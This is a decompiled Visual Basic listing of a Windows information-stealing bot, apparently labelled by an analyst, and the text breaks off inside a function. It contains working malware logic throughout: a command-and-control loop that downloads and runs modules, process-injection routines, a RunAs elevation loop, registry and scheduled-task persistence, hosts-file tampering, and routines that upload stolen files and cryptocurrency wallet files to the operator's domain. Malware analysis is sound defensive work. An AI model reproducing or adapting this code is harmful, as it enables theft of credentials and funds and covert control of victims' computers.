loc_405C30: var_98 = (CDbl(Asc(Mid$(Me(124), var_A0, 1))) * Abs(Cos(Sqr(var_98)))) | |
loc_405C3E: Next var_C8 'Long | |
loc_405C51: For var_DC = 1 To Len(arg_C): var_A0 = var_DC 'Long | |
loc_405C8B: var_8C = Chr$(CLng(Asc(Mid$(arg_C, var_A0, 1))) Xor CLng((CDbl(var_9C) + Int(var_98)))) & var_8C | |
loc_405C9D: Next var_DC 'Long | |
loc_405CB3: var_8C = Chr$(var_9C) & var_8C | |
loc_405CC7: For var_E8 = 1 To Len(var_8C): var_A0 = var_E8 'Long | |
loc_405D08: If (Len(Hex$(CVar(Asc(Mid$(var_8C, var_A0, 1))))) = 1) Then | |
loc_405D14: var_90 = "0" & var_90 | |
loc_405D17: End If | |
loc_405D20: var_88 = var_88 & var_90 | |
loc_405D28: Next var_E8 'Long | |
loc_405D2F: Exit Sub | |
End Sub | |
Public Sub Proc_0_19_404CD8(arg_C) '404CD8 | |
'Data Table: 401634 | |
loc_404C78: var_8C = CStr(Split(Str$(Round(CVar(Cos(Sqr(CDbl(Len(arg_C))))), &HF)), ".", -1, 0)(1)) | |
loc_404C9B: For var_13C = 1 To Len(var_8C): var_94 = var_13C 'Long | |
loc_404CC2: var_88 = var_88 & CStr(Asc(Mid$(var_8C, var_94, 1))) | |
loc_404CD2: Next var_13C 'Long | |
loc_404CD7: Exit Sub | |
End Sub | |
Public Sub Proc_0_20_4054D4 | |
'Data Table: 401634 | |
Dim MemVar_40B3A4 As Global | |
Dim var_8A As Integer | |
Dim var_AC As Variant | |
Dim var_CC As Variant | |
Dim var_EC As Variant | |
Dim var_10C As String | |
Dim var_12C As Integer | |
loc_4053A0: On Error Resume Next | |
loc_4053B1: var_90 = MemVar_40B3A4.App | |
loc_4053CE: var_8A = Proc_0_21_404594(App.EXEName & ".exe") | |
loc_4053FD: CAdVar | |
loc_405414: var_AC = CVar(SYSTEM32_DIR & "cmd.exe") 'String | |
loc_40542F: var_CC = CVar("/c " & """" & Me(88) & """") 'String | |
loc_405438: var_EC = CVar(0) 'String | |
loc_40543C: var_10C = "RunAs" | |
loc_405442: var_12C = 0 | |
loc_40544B: Call CreateObject(get_object_type(3, 0), var_8A).ShellExecute | |
loc_405463: Set var_88 = Nothing | |
loc_405467: ' Referenced from: 405482 | |
loc_40547F: If (Proc_0_21_404594("consent" & ".exe", var_12C, var_10C) > 0) Then | |
loc_405482: GoTo loc_405467 | |
loc_405485: End If | |
loc_405493: var_90 = MemVar_40B3A4.App | |
loc_4054BE: If (Proc_0_21_404594(App.EXEName & ".exe", var_EC) <= var_8A) Then | |
loc_4054C3: Proc_0_20_4054D4(var_CC) | |
loc_4054CB: Else | |
loc_4054CD: End | |
loc_4054CF: End If | |
loc_4054D1: Exit Sub | |
End Sub | |
Public Sub Proc_0_21_404594(arg_C) '404594 | |
'Data Table: 401634 | |
Dim var_104 As Variant | |
loc_40453D: var_104 = CVar("select * from " & "win32_" & "Process" & " where " & "Name" & "='" & arg_C & "'") 'String | |
loc_40455A: VarLateMemCallLdVar | |
loc_404562: CAdVar | |
loc_404593: Result CInt(GetObject("winmgmts:", var_E4).Count) End Sub 'Integer | |
End Sub | |
Public Sub load_param(index, is_encrypted) '4067E8 | |
'Data Table: 401634 | |
Dim var_B0 As Integer | |
Dim var_AE As Integer | |
Dim arg_2008 As Variant | |
Dim var_B4 As Long | |
Dim var_B8 As Long | |
loc_4065B0: On Error Resume Next | |
loc_4065C2: var_B0 = CInt((Len(PARAMS_STORAGE) - &H3C)) | |
loc_4065C5: ' Referenced from: 4065F8 | |
loc_4065DA: If ((LBound(var_A0, 1) + CLng(var_B0)) > UBound(var_A0, 1)) Then | |
loc_4065F3: var_B0 = CInt(((LBound(var_A0, 1) + CLng(var_B0)) - UBound(var_A0, 1))) | |
loc_4065F8: GoTo loc_4065C5 | |
loc_4065FB: End If | |
loc_40660A: For var_C4 = 1 To &H29: var_BC = var_C4 'Long | |
loc_40661B: If ((&H61 + var_AE) >= &H7B) Then | |
loc_406622: var_AE = 0 | |
loc_40662D: var_B0 = (var_B0 + 1) | |
loc_406630: End If | |
loc_406643: If ((LBound(var_A0, 1) + CLng(var_B0)) > &H7A) Then | |
loc_40664A: var_B0 = 1 | |
loc_40664D: End If | |
loc_406679: var_A8 = var_A8 & Chr$((LBound(var_A0, 1) + CLng(var_B0))) & Chr$(CLng((&H61 + var_AE))) | |
loc_40668D: var_AE = (var_AE + 2) | |
loc_40669B: If (var_BC < &H29) Then | |
loc_4066B1: var_A8 = var_A8 & Chr$(&H2C) | |
loc_4066B7: End If | |
loc_4066BC: Next var_C4 'Long | |
loc_4066EE: arg_2008 = Split(var_A8, CVar(Chr$(&H2C)), -1, 0) | |
loc_4066F8: var_AC = arg_2008 | |
loc_406736: var_B4 = (InStr(1, PARAMS_STORAGE, var_AC(CLng(index)) & Chr$(&H3E), 0) + 3) | |
loc_40676A: var_B8 = InStr(var_B4, PARAMS_STORAGE, Chr$(&H3C) & var_AC(CLng(index)), 0) | |
loc_40677F: If (var_B8 <> 0) Then | |
loc_4067AC: If (Mid$(PARAMS_STORAGE, var_B4, CVar((var_B8 - var_B4))) = "1") Then | |
loc_4067B5: var_88 = CStr(&HFF) | |
loc_4067B8: End If | |
loc_4067BD: If is_encrypted Then | |
loc_4067CF: var_88 = decrypt(var_88, Me(92)) | |
loc_4067D2: End If | |
loc_4067D5: Else | |
loc_4067DD: var_88 = CStr(0) | |
loc_4067E0: End If | |
loc_4067E4: Exit Sub | |
End Sub | |
Public Sub post_content(file, filename, type) '407344 | |
'Data Table: 401634 | |
Dim var_AC As Variant | |
Dim var_104 As String | |
Dim var_D0 As Variant | |
loc_407103: If ((FileLen(file) > &HA) And get_attribute1(file)) Then | |
loc_407108: On Error Resume Next | |
loc_407111: Set var_98 = New | |
loc_40711B: boundary_id = make_random_string() | |
loc_407123: If type Then | |
loc_40715F: var_90 = Mid$(CStr(StrConv(CVar(file_binary_open(file)), &H80, 0)), 2, var_E0) | |
loc_407175: Else | |
loc_40717F: var_90 = file_binary_open(file) | |
loc_407182: End If | |
loc_4071D2: var_104 = "--" & boundary_id & vbCrLf & "Content-Disposition: form-data; Name=""" & Left$(Me(124), 3) & """; filename=""" | |
loc_40726D: var_AC = StrConv(var_104 & filename & """" & vbCrLf & "Content-Type" & ": file" & vbCrLf & vbCrLf & var_90 & vbCrLf & "--" & boundary_id & "--", &H80, 0) | |
loc_407289: Set var_138 = var_98 | |
loc_4072A1: var_D0 = False | |
loc_4072D0: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_24 ("POST", MY_DOMAIN & "?" & Left$(Me(124), 3) & "=1") | |
loc_407304: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_28 ("Content-Type", "multipart/" & "form-data" & "; boundary=" & boundary_id) | |
loc_407320: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_34 (var_AC) | |
loc_407329: Set var_138 = Nothing | |
loc_407334: Set var_98 = Nothing | |
loc_407337: End If | |
loc_407342: Result &HFF End Sub 'Integer | |
End Sub | |
Public Sub make_persistent(add_schtask) '405B68 | |
'Data Table: 401634 | |
Dim var_A0 As Variant | |
Dim var_D0 As String | |
Dim var_C0 As Integer | |
Dim var_E0 As Boolean | |
loc_405A08: On Error Resume Next | |
loc_405A12: If Me(156) Then | |
loc_405A31: FileCopy Me(88), Me(40) & MY_APPNAME & ".exe" | |
loc_405A3D: End If | |
loc_405A44: Set var_90 = WSCRIPT_OBJ | |
loc_405A4F: If Me(152) Then | |
loc_405A5D: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\run\" & MY_APPNAME) 'String | |
loc_405A6A: var_D0 = "REG_SZ" | |
loc_405A73: Call var_90.RegWrite | |
loc_405A7C: End If | |
loc_405A83: If Me(154) Then | |
loc_405A91: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\" & MY_APPNAME) 'String | |
loc_405A9E: var_D0 = "REG_SZ" | |
loc_405AA7: Call var_90.RegWrite | |
loc_405AB0: End If | |
loc_405AB7: If Me(158) Then | |
loc_405AC5: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & MY_APPNAME) 'String | |
loc_405AD2: var_D0 = "REG_SZ" | |
loc_405ADB: Call var_90.RegWrite | |
loc_405AE4: End If | |
loc_405AEC: If (add_schtask <> &HFF) Then | |
loc_405AF6: If Me(160) Then | |
loc_405B30: var_A0 = CVar("schtasks /" & "create /sc ONLOGON /tn " & MY_APPNAME & ".exe" & " /tr " & """" & Me(88) & """") 'String | |
loc_405B34: var_C0 = 0 | |
loc_405B3A: var_E0 = False | |
loc_405B42: Call var_90.Run | |
loc_405B5A: End If | |
loc_405B5A: End If | |
loc_405B5E: Set var_90 = Nothing | |
loc_405B64: Exit Sub | |
End Sub | |
Public Sub Proc_0_25_4082A0(arg_C, arg_10, arg_14) '4082A0 | |
'Data Table: 401634 | |
Dim var_124 As Long | |
Dim var_8C As Long | |
Dim var_90 As Long | |
Dim var_98 As Long | |
Dim var_128 As Long | |
Dim var_12C As Long | |
Dim var_94 As Long | |
loc_407F73: var_F0 = StrConv(arg_C, &H80, 0) | |
loc_407F80: If (arg_10 = "1") Then | |
loc_407F88: IStStrCopy | |
loc_407F8C: End If | |
loc_407F96: If (Len(arg_14) > 0) Then | |
loc_407FAA: arg_14 = ChrW$(&H20) & arg_14 | |
loc_407FB1: End If | |
loc_407FC2: var_124 = VarPtr(var_F0(0)) | |
loc_407FCB: var_8C = var_124 | |
loc_407FE1: If (Proc_0_26_403C5C(var_8C, 2, var_8C) <> &H5A4D) Then | |
loc_407FE4: Result var_124 End Sub 'Integer | |
loc_407FE5: End If | |
loc_407FFC: var_90 = (var_8C + Proc_0_26_403C5C((var_8C + &H3C), 4)) | |
loc_408012: If (Proc_0_26_403C5C(var_90, 4) <> &H4550) Then | |
loc_408015: Result var_90 End Sub 'Integer | |
loc_408016: End If | |
loc_408029: var_98 = Proc_0_26_403C5C((var_90 + &H34), 4) | |
loc_408039: var_B0(0) = &H44 | |
loc_40804D: var_128 = VarPtr(arg_14) | |
loc_40805E: var_12C = VarPtr(var_B0(0)) | |
loc_408096: UnknownFunc(VarPtr(arg_10)) | |
loc_4080A7: UnknownFunc(var_CC(0)) | |
loc_4080D2: var_12C = VarPtr(Proc_0_26_403C5C((var_90 + &H50), 4, VarPtr(var_98), var_98, VarPtr(var_98), 0, 0, 0)) | |
loc_4080F3: UnknownFunc(var_CC(0)) | |
loc_408109: var_124 = VarPtr(var_F0(0)) | |
loc_408122: var_128 = Proc_0_26_403C5C((var_90 + &H54), 4, var_124, var_128, 0, var_12C, &H3000, &H40) | |
loc_40813C: UnknownFunc(var_CC(0)) | |
loc_408162: For var_134 = var_12C To (Proc_0_26_403C5C((var_90 + 6), 2, var_F4, 0, var_98, var_124, var_128, 0) - 1): var_128 = var_134 'Long | |
loc_40817B: var_94 = ((var_90 + &HF8) + (&H28 * var_F4)) | |
loc_4081BD: var_12C = Proc_0_26_403C5C((var_94 + &H10), 4, Proc_0_26_403C5C((var_94 + &H14), 4, Proc_0_26_403C5C((var_94 + &HC), 4, var_94, var_12C, 4), 0)) | |
loc_4081DF: UnknownFunc(var_CC(0)) | |
loc_4081E7: Next var_134 'Long | |
loc_4081F9: var_E8(0) = &H10007 | |
loc_408211: UnknownFunc(var_CC(1)) | |
loc_408246: UnknownFunc(var_CC(0)) | |
loc_40826A: var_E8(&H2C) = (4 + Proc_0_26_403C5C((var_90 + &H28), 4, var_98, (var_E8(&H29) + 8), VarPtr(var_98))) | |
loc_408282: UnknownFunc(var_CC(1)) | |
loc_408295: UnknownFunc(var_CC(1)) | |
loc_40829F: Result &HFF End Sub 'Integer | |
End Sub | |
Public Sub Proc_0_26_403C5C | |
'Data Table: 401634 | |
Dim var_8C As Long | |
loc_403C40: var_8C = VarPtr(var_88) | |
loc_403C56: UnknownFunc(-1) | |
loc_403C5B: Exit Sub | |
End Sub | |
Public Sub parse_and_execute_commands(params_str) '409670 | |
'Data Table: 401634 | |
Dim var_D0 As Integer | |
Dim var_A0 As Variant | |
Dim var_FC As String | |
Dim var_B0 As Variant | |
Dim var_128 As Boolean | |
loc_408F30: On Error Resume Next | |
loc_408F6D: var_8C = Trim$(CStr(Split(params_str, "|", -1, 0)(1))) | |
loc_408F9E: var_90 = "|" & MY_DOMAIN & "|" & Me(128) & "|" | |
loc_408FAC: test_connection_microsoft() | |
loc_408FE2: command_id = Split(params_str, "|", -1, 0)(0) 'Variant | |
loc_408FFA: If (command_id = 0) Then | |
loc_409002: fingerprint_system(var_8C) | |
loc_40900A: Else | |
loc_409017: If (command_id = 1) Then | |
loc_409036: var_FC = 0 | |
loc_40904C: Proc_0_25_4082A0(process_data(var_8C, 0), "1") | |
loc_40905F: Else | |
loc_40906C: If (command_id = 2) Then | |
loc_409093: module_path = 0 & make_random_string(TEMP_DIR, Right$(var_8C, 3)) & Right$(var_8C, 3) | |
loc_4090B1: If process_and_write_to_file(var_8C, module_path) Then | |
loc_4090B9: shell_execute(module_path) | |
loc_4090BE: End If | |
loc_4090C1: Else | |
loc_4090CE: If (command_id = 3) Then | |
loc_4090E1: module_path = 0 & make_random_string(TEMP_DIR) | |
loc_40910D: If (LCase$(Right$(var_8C, 4)) = ".vbs") Then | |
loc_409119: module_path = module_path & ".vbs" | |
loc_40911F: Else | |
loc_40912A: module_path = module_path & ".exe" | |
loc_40912D: End If | |
loc_409141: If process_and_write_to_file(var_8C, module_path) Then | |
loc_409158: modify_bot_install(module_path, 0, &HFF) | |
loc_40915D: End If | |
loc_409162: Else | |
loc_40916F: If (command_id = 4) Then | |
loc_40917F: shell_execute("Explorer " & var_8C, &HFF) | |
loc_40918A: Else | |
loc_409197: If (command_id = 5) Then | |
loc_4091A3: var_B0 = CVar("iexplore " & var_8C) 'String | |
loc_4091A7: var_D0 = 0 | |
loc_4091AD: var_128 = True | |
loc_4091B6: Call MemVar_402104.Run | |
loc_4091C2: Else | |
loc_4091CF: If (command_id = 6) Then | |
loc_4091F2: Proc_0_29_4059BC(&HA, CStr(1) & var_90 & var_8C, var_128) | |
loc_409203: Else | |
loc_409210: If (command_id = 7) Then | |
loc_409233: Proc_0_29_4059BC(&HA, CStr(2) & var_90 & var_8C, var_D0) | |
loc_409244: Else | |
loc_409251: If (command_id = 8) Then | |
loc_409274: Proc_0_29_4059BC(&HA, CStr(3) & var_90 & var_8C) | |
loc_409285: Else | |
loc_409292: If (command_id = 9) Then | |
loc_4092AA: Proc_0_29_4059BC(6, 0) | |
loc_4092B5: Else | |
loc_4092C2: If (command_id = 10) Then | |
loc_4092CC: If UnknownFunc(var_B0) Then | |
loc_4092DB: If get_attribute1(OFF_C) Then | |
loc_4092EA: Kill OFF_C | |
loc_4092F2: Else | |
loc_409306: write_to_file(OFF_C, 0) | |
loc_40931A: Kill HOSTS_PATH | |
loc_40931F: End If | |
loc_409321: End If | |
loc_409326: Else | |
loc_409333: If (command_id = 11) Then | |
loc_409342: If get_attribute1(POS_PATH) Then | |
loc_409349: Me(168) = 0 | |
loc_409355: kill_task(POS_EXE) | |
loc_409366: Kill OUTPUT_TXT | |
loc_409377: Kill POS_PATH | |
loc_40937F: Else | |
loc_409385: Me(168) = &HFF | |
loc_40938A: End If | |
loc_40938F: Else | |
loc_40939C: If (command_id = 12) Then | |
loc_4093A1: Proc_0_31_4046A4(0) | |
loc_4093A9: Else | |
loc_4093B6: If (command_id = 13) Then | |
loc_4093FA: write_to_file(MY_DIR & "email.txt", process_data(MY_DOMAIN & "?u=" & "0", &HFF)) | |
loc_409417: Proc_0_29_4059BC(7, 0) | |
loc_409422: Else | |
loc_40942F: If (command_id = 14) Then | |
loc_40943F: Proc_0_29_4059BC(8, var_8C) | |
loc_409447: Else | |
loc_409454: If (command_id = 15) Then | |
loc_409464: Proc_0_29_4059BC(9, var_8C) | |
loc_40946C: Else | |
loc_409479: If (command_id = 16) Then | |
loc_409487: shutdown_or_reboot("1") | |
loc_409492: Else | |
loc_40949F: If (command_id = 17) Then | |
loc_4094AD: shutdown_or_reboot("0") | |
loc_4094B8: Else | |
loc_4094C5: If (command_id = 18) Then | |
loc_4094CA: End | |
loc_4094CF: Else | |
loc_4094D4: var_A0 = 19 | |
loc_4094DC: If (command_id = 19) Then | |
loc_4094EC: DeleteSetting("L!NK", var_A0, var_D0) | |
loc_40950B: modify_bot_install("1", 0, &HFF) | |
loc_409516: Else | |
loc_409523: If (command_id = 20) Then | |
loc_40953F: Proc_0_29_4059BC(&HE, CStr(1) & var_90) | |
loc_40954E: Else | |
loc_40955B: If (command_id = 21) Then | |
loc_40957E: Proc_0_29_4059BC(&HE, CStr(2) & var_90 & var_8C) | |
loc_40958F: Else | |
loc_40959C: If (command_id = 22) Then | |
loc_4095BF: Proc_0_29_4059BC(&HE, CStr(3) & var_90 & var_8C) | |
loc_4095D0: Else | |
loc_4095DD: If (command_id = 23) Then | |
loc_4095ED: Proc_0_29_4059BC(&HF, var_90) | |
loc_4095F5: Else | |
loc_409602: If (command_id = 24) Then | |
loc_409617: Proc_0_29_4059BC(&HF, CStr(1)) | |
loc_409622: Else | |
loc_40962F: If (command_id = 25) Then | |
loc_409652: Proc_0_29_4059BC(&HE, CStr(4) & var_90 & var_8C) | |
loc_409663: Else | |
loc_409667: Exit Sub | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_40966C: Exit Sub | |
End Sub | |
Public Sub cnc_post_and_read | |
'Data Table: 401634 | |
Dim var_98 As Variant | |
Dim var_C8 As Boolean | |
Dim var_EC As Variant | |
loc_405520: On Error Resume Next | |
loc_40552A: Set conn_obj = MSXML_OBJ | |
loc_405530: var_98 = "POST" | |
loc_40553F: var_C8 = False | |
loc_405547: Call conn_obj.Open | |
loc_40554F: var_98 = "User-Agent" | |
loc_405561: Call conn_obj.SetRequestHeader | |
loc_405569: var_98 = "Content-Type" | |
loc_405578: Call conn_obj.SetRequestHeader | |
loc_40558E: var_EC = CVar(var_98 & Proc_0_9_4040BC(Me(12), "application/x-www-form-urlencoded", var_98, Me(128))) 'String | |
loc_405595: Call conn_obj.Send | |
loc_4055F3: If CBool((conn_obj.StatusText <> "OK") Or (InStr(1, conn_obj.ResponseText, CVar(ChrW$(&H3C)), 0) <> 0)) Then | |
loc_4055F8: Exit Sub | |
loc_4055F9: End If | |
loc_405612: If (Len(conn_obj.ResponseText) > 3) Then | |
loc_40562D: parse_and_execute_commands(base64_decode(CStr(conn_obj.ResponseText), conn_obj.ResponseText, var_C8), MY_DOMAIN) | |
loc_40563C: End If | |
loc_405640: Set conn_obj = Nothing | |
loc_405646: Exit Sub | |
End Sub | |
Public Sub Proc_0_29_4059BC(arg_C, arg_10) '4059BC | |
'Data Table: 401634 | |
Dim var_98 As String | |
Dim var_8C As Long | |
loc_405854: On Error Resume Next | |
loc_405881: var_88 = process_data(MY_DOMAIN & "?p=" & CStr(arg_C), 0) | |
loc_405898: If (arg_C = &HB) Then | |
loc_4058AD: var_98 = MY_APPNAME & ".exe" & "|" | |
loc_4058CA: Proc_0_25_4082A0(var_88, SYSTEM32_DIR & "wscript.exe") | |
loc_4058DD: Else | |
loc_4058F8: If Proc_0_25_4082A0(var_88, "1", arg_10) Then | |
loc_405906: If (arg_C = 6) Then | |
loc_405910: var_8C = 0 | |
loc_405925: ssc_file = MY_DIR & "ss" & ".c" | |
loc_40592B: ' Referenced from: 4059AD | |
loc_405936: If (var_8C <= 4) Then | |
loc_405943: If get_attribute1(ssc_file, var_8C) Then | |
loc_405973: If post_content(ssc_file, Proc_0_49_404F40(6, var_98 & Me(88))) Then | |
loc_405980: Kill ssc_file | |
loc_405985: End If | |
loc_405987: GoTo loc_4059B0 | |
loc_40598D: Else | |
loc_405996: Sleep(&H3E8) | |
loc_4059A6: var_8C = (var_8C + 1) | |
loc_4059A9: End If | |
loc_4059AD: GoTo loc_40592B | |
loc_4059B0: ' Referenced from: 405987 | |
loc_4059B0: End If | |
loc_4059B0: End If | |
loc_4059B2: End If | |
loc_4059B4: End If | |
loc_4059B8: Exit Sub | |
End Sub | |
Public Sub Proc_0_30_4060D8 | |
'Data Table: 401634 | |
Dim var_9C As Long | |
Dim var_92 As Integer | |
Dim var_86 As Integer | |
loc_405F48: On Error Resume Next | |
loc_405F5A: For index = 0 To 5: _index = index 'Long | |
loc_405F77: filename = APPDATA_DIR & CStr(_index) & ".c" | |
loc_405F88: var_9C = 0 | |
loc_405FB5: var_8C = process_data(MY_DOMAIN & "?p=" & CStr(_index), 0, &HFF) | |
loc_405FCC: If (_index = 2) Then | |
loc_405FD3: var_92 = &HFF | |
loc_405FD6: End If | |
loc_40600D: If Proc_0_25_4082A0(var_8C, "1", "/stext " & """" & filename & """") Then | |
loc_406010: ' Referenced from: 406079 | |
loc_40601B: If (var_9C <= 4) Then | |
loc_406028: If get_attribute1(filename, var_92) Then | |
loc_406045: post_content(filename, Proc_0_49_404F40(_index, var_9C)) | |
loc_406053: GoTo loc_40607C | |
loc_406059: Else | |
loc_406062: Sleep(&H3E8) | |
loc_406072: var_9C = (var_9C + 1) | |
loc_406075: End If | |
loc_406079: GoTo loc_406010 | |
loc_40607C: ' Referenced from: 406053 | |
loc_40607C: End If | |
loc_40607C: End If | |
loc_406085: var_8C = 0 | |
loc_40608C: var_92 = 0 | |
loc_40608F: ' Referenced from: 4060B4 | |
loc_406099: If get_attribute1(filename, var_92, var_9C) Then | |
loc_4060A6: Kill filename | |
loc_4060AD: DoEvents() | |
loc_4060B4: GoTo loc_40608F | |
loc_4060B7: End If | |
loc_4060BC: Next index 'Long | |
loc_4060C8: If steal_wallets() Then | |
loc_4060CF: var_86 = &HFF | |
loc_4060D2: End If | |
loc_4060D4: Result var_86 End Sub 'Integer | |
End Sub | |
Public Sub Proc_0_31_4046A4 | |
'Data Table: 401634 | |
loc_4045FE: If get_attribute1(LOGNAME) Then | |
loc_40460A: kill_task("dwn.exe") | |
loc_404617: Sleep(&H3E8) | |
loc_404626: SetAttr DWN_EXE, 0 | |
loc_404635: Kill LOGNAME | |
loc_404644: Kill KEYS_C | |
loc_404653: Kill DWN_EXE | |
loc_404662: Kill WIN_C | |
loc_40466A: Else | |
loc_40469A: If process_and_write_to_file(MY_DOMAIN & "?p=" & CStr(&HC), LOGNAME) Then | |
loc_40469D: Proc_0_32_4051F0(0) | |
loc_4046A2: End If | |
loc_4046A2: End If | |
loc_4046A2: Exit Sub | |
End Sub | |
Public Sub Proc_0_32_4051F0 | |
'Data Table: 401634 | |
loc_4050E4: On Error Resume Next | |
loc_40510C: var_88 = decrypt(file_binary_open(LOGNAME)) | |
loc_405128: var_94 = MY_DOMAIN & "?u=" & CStr(2) | |
loc_40513E: Kill KEYS_C | |
loc_40514F: UnknownFunc(var_94) | |
loc_405173: var_90 = process_data(var_94, &HFF, 0) | |
loc_40519B: If ((Len(var_90) > 4) And (InStr(1, var_90, ",", 0) <> 0)) Then | |
loc_4051A8: write_to_file(WIN_C, var_90, StrConv(var_94, vbUnicode)) | |
loc_4051AD: End If | |
loc_4051B9: FileCopy Me(88), DWN_EXE | |
loc_4051CA: SetAttr DWN_EXE, 6 | |
loc_4051E4: Proc_0_25_4082A0(var_88, DWN_EXE, 0) | |
loc_4051EE: Exit Sub | |
End Sub | |
Public Sub steal_wallets | |
'Data Table: 401634 | |
Dim var_2A0 As Variant | |
Dim var_290 As Variant | |
Dim var_278 As Variant | |
loc_407740: On Error Resume Next | |
loc_407752: ReDim _arr(0 To &H1B) | |
loc_407769: _arr(0) = "MultiBit" | |
loc_407778: _arr(1) = "Armory" | |
loc_407787: _arr(2) = "Electrum" | |
loc_407796: _arr(3) = "digital" | |
loc_4077A5: _arr(4) = "-LTC" | |
loc_4077B4: _arr(5) = "MultiDoge" | |
loc_4077C3: _arr(6) = "BitcoinDark" | |
loc_4077D2: _arr(7) = "Unobtanium" | |
loc_4077E1: _arr(8) = "Dash" | |
loc_4077F0: _arr(9) = "Bit" | |
loc_4077FF: _arr(&HA) = "Lite" | |
loc_40780E: _arr(&HB) = "Name" | |
loc_40781D: _arr(&HC) = "PP" | |
loc_40782C: _arr(&HD) = "Feather" | |
loc_40783B: _arr(&HE) = "Nova" | |
loc_40784A: _arr(&HF) = "Prime" | |
loc_407859: _arr(&H10) = "Terra" | |
loc_407868: _arr(&H11) = "Dev" | |
loc_407877: _arr(&H12) = "Anon" | |
loc_407886: _arr(&H13) = "Pay" | |
loc_407895: _arr(&H14) = "World" | |
loc_4078A4: _arr(&H15) = "Quark" | |
loc_4078B3: _arr(&H16) = "Infinite" | |
loc_4078C2: _arr(&H17) = "Doge" | |
loc_4078D1: _arr(&H18) = "Asic" | |
loc_4078E0: _arr(&H19) = "Lotto" | |
loc_4078EF: _arr(&H1A) = "Dark" | |
loc_4078FE: _arr(&H1B) = "Mona" | |
loc_407912: mArr = Array(_arr) 'Variant | |
loc_407923: CRefVarAry | |
loc_40792A: For index = 0 To UBound(mArr, 1): _index = index 'Long | |
loc_40793B: If (_index = 4) Then | |
loc_407966: var_2A0 = mArr(2) & mArr(_index) | |
loc_40796E: VarIndexSt | |
loc_40797B: End If | |
loc_407986: If (_index > 8) Then | |
loc_4079A7: var_290 = mArr(_index) & "coin" | |
loc_4079AF: VarIndexSt | |
loc_4079BA: End If | |
loc_4079D4: var_290 = CVar(APPDATA_DIR) & mArr(_index) | |
loc_4079E2: var_8C = CStr(var_290 & "\") | |
loc_4079FD: If Proc_0_14_403F14(var_8C, 0, mArr, var_290, _index) Then | |
loc_407A0E: var_278 = CVar(var_8C & "*.wallet") 'String | |
loc_407A16: var_90 = Dir(var_278, 0) | |
loc_407A1C: ' Referenced from: 407AAB | |
loc_407A24: If CBool(Len(var_90)) Then | |
loc_407A7B: post_content(var_8C & var_90, CStr(var_278 & "_" & CVar(VOL_SERIAL) & "-" & CVar(var_90)), 0, mArr(_index)) | |
loc_407AA3: var_90 = Dir(var_278, 0) | |
loc_407AAB: GoTo loc_407A1C | |
loc_407AAE: End If | |
loc_407AAE: End If | |
loc_407AB5: Next index 'Long | |
loc_407AC3: Result &HFF End Sub 'Integer | |
End Sub | |
Public Sub process_data(arg_C, to_b64, to_encrypt) '40580C | |
'Data Table: 401634 | |
Dim var_A8 As Long | |
Dim var_98 As Long | |
Dim var_BA As Integer | |
Dim var_92 As Integer | |
Dim var_A4 As String | |
loc_4056A4: On Error Resume Next | |
loc_405700: var_A4 = arg_C | |
loc_40570C: var_A8 = UnknownFunc(UnknownFunc(Me(128))) | |
loc_40571A: var_98 = var_A8 | |
loc_405739: res_str = String$(&H1000, CVar(Chr$(&H30))) | |
loc_405741: ' Referenced from: 4057A7 | |
loc_405750: var_A4 = res_str | |
loc_40575C: var_BA = UnknownFunc(var_98) | |
loc_40576D: var_92 = CBool(var_BA) | |
loc_405783: If ((var_9C = 0) Or Not(var_92)) Then | |
loc_405788: GoTo loc_4057AA | |
loc_40578B: End If | |
loc_40579B: var_A4 = Left$(res_str, var_9C) | |
loc_40579F: var_8C = var_8C & var_A4 | |
loc_4057A7: GoTo loc_405741 | |
loc_4057AA: ' Referenced from: 405788 | |
loc_4057B6: If (Len(var_8C) <> 0) Then | |
loc_4057BE: If to_encrypt Then | |
loc_4057D7: var_88 = decrypt(var_8C, Proc_0_19_404CD8(var_8C, var_92, StrConv(res_str, vbUnicode), var_A4, var_BA, var_A4, Len(res_str)), var_9C, var_98, StrConv(arg_C, vbUnicode)) | |
loc_4057E0: Else | |
loc_4057E7: If to_b64 Then | |
loc_4057F4: var_88 = base64_decode(var_8C, var_A4, var_A8) | |
loc_4057FA: Else | |
loc_4057FF: var_88 = var_8C | |
loc_405802: End If | |
loc_405802: End If | |
loc_405804: End If | |
loc_405808: Exit Sub | |
End Sub | |
Public Sub file_binary_open(filename) '403E94 | |
'Data Table: 401634 | |
loc_403E54: On Error Resume Next | |
loc_403E60: Open filename For Binary As 1 Len = &HFF | |
loc_403E72: var_8C = Space$(LOF(1)) | |
loc_403E81: Get 1, 0, var_8C | |
loc_403E87: Close 1 | |
loc_403E8E: var_88 = var_8C | |
loc_403E93: Exit Sub | |
End Sub | |
Public Sub write_to_file(filename, content) '404158 | |
'Data Table: 401634 | |
loc_4040F8: On Error Resume Next | |
loc_404107: If (Len(content) < &H400) Then | |
loc_404113: Open filename For Output As 1 Len = &HFF | |
loc_40411E: Print 1, content | |
loc_404128: Close 1 | |
loc_40412D: Else | |
loc_404138: Open filename For Binary As 1 Len = &HFF | |
loc_404148: Put 1, 0, content | |
loc_40414E: Close 1 | |
loc_404150: End If | |
loc_404154: Exit Sub | |
End Sub | |
Public Sub shell_execute(arg_C) '403C08 | |
'Data Table: 401634 | |
Dim var_9C As Double | |
loc_403BE8: On Error Resume Next | |
loc_403BFF: var_9C = Shell(arg_C, 0) | |
loc_403C04: Exit Sub | |
End Sub | |
Public Sub shutdown_or_reboot(arg_C) '403E14 | |
'Data Table: 401634 | |
loc_403DE0: If (arg_C = "1") Then | |
loc_403DE6: var_88 = "r" | |
loc_403DEC: Else | |
loc_403DEF: var_88 = "s" | |
loc_403DF2: End If | |
